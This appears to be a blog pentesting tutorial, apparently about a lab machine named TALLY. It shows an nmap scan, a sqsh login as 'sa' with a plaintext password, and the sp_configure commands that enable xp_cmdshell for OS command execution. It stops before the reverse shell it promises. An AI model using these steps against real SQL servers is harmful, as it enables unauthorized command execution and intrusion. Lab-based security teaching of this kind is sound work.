MSSQL RCE and Reverse Shell xp_cmdshell

Hi Guys

Finaly i am back with pentesting tutorial after few weeks discussing about reverse engineering (assembly).

Usually after you get access to the database server, you will think what move that I could take for the next step. I would like to discuss about how do you create a reverse shell from an MS SQL server.

First you should ensure that the MSSQL is up and running using nmap

we can see that port 1433 is open

1433/tcp open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2016 13.00.1601.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2020-01-30T21:51:35
| Not valid after:  2050-01-30T21:51:35
| MD5:   8c4b 425d cfa5 28d4 ea66 30c0 3cbc 525c
| SHA-1: bb46 babd 9897 0f84 7fa7 b56e df63 392a 2040 21e4

OK.. I will skip how did I find the user name and password to the database. Lets jump in to the shell creation

You can connect to the MSSQL using the command below

sqsh -S -U sa -P GWE3V65#6KFH93@4GWTG2G

After we connect to the database using the above command, we need to check if we can execute command shell using xp_cmdshell. lets try to execute below

xp_cmdshell 'whoami'

Msg 15281, Level 16, State 1
Server 'TALLY', Procedure 'xp_cmdshell', Line 1
SQL Server blocked access to procedure 'sys.xp_cmdshell' of component
'xp_cmdshell' because this component is turned off as part of the security
configuration for this server. A system administrator can enable the use of
'xp_cmdshell' by using sp_configure. For more information about enabling
'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.

if the output like the above then you need to activate the cmdshell feature with below command

1> EXEC SP_CONFIGURE 'show advanced options',1
2> reconfigure 
3> go
Configuration option 'show advanced options' changed from 0 to 1. Run the
RECONFIGURE statement to install.
(return status = 0)

1> EXEC SP_CONFIGURE 'xp_cmdshell',1
2> reconfigure 
3> go
Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE
statement to install.
(return status = 0)

With the above command we have configured that our SQL Server is able to execute command at the server.

OK, That is all.. I will continue in the next post on how to do the reverse shell creation with nishang powershell by using the xp_cmdshell functionality

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s